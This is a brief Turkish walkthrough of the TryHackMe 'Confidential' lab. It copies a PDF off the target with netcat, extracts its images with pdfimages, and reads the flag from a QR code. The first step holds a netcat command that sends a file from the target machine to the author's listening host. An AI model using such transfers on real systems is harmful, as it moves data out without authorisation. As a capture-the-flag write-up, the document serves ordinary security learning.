TryHackMe – Confidential Makine Çözümü

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Confidential” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Hedef makinedeki PDF dosyasını kendi makineme aktarıyorum.

# Hedef Makine
ubuntu@thm-confidential:~/confidential$ nc 10.8.94.51 4444 < Repdf.pdf

# Kendi Bilgisayarım
[root:...ktop/TRYHACKME/Confidential]# nc -lvnp 4444 > Repdf.pdf
Listening on 0.0.0.0 4444
Connection received on 10.10.141.32 56868

2 — PDF dosyasının içerisindeki görüntüleri çıkarmak için “pdfimages” komutunu kullanıyorum. Bu komutu kullanabilmek için “apt install poppler-utils” paketini indirmelisiniz.

Komutun açıklaması:

  • “pdfimages”: Bir PDF dosyasındaki görüntüleri ayıklamak için kullanılan bir komut.
  • “-all”: Tüm sayfalardaki görüntüleri ayıklamak için bu seçenek kullanılır.
  • “Repdf.pdf”: İşlem yapılacak olan PDF dosyasının adı veya yolunu belirtir.
  • “images”: Ayıklanan görüntülerin kaydedileceği klasörün adıdır. Bu adı istediğiniz gibi değiştirebilirsiniz.
[root:...ktop/TRYHACKME/Confidential]# pdfimages -all Repdf.pdf images
[root:...ktop/TRYHACKME/Confidential]# ls
confidential.txt  images-000.png  images-001.png  images-002.png  Repdf.pdf
3 — Çıkan fotoğraflardaki QR kodunu tarattıktan sonra bayrağı elde ediyorum.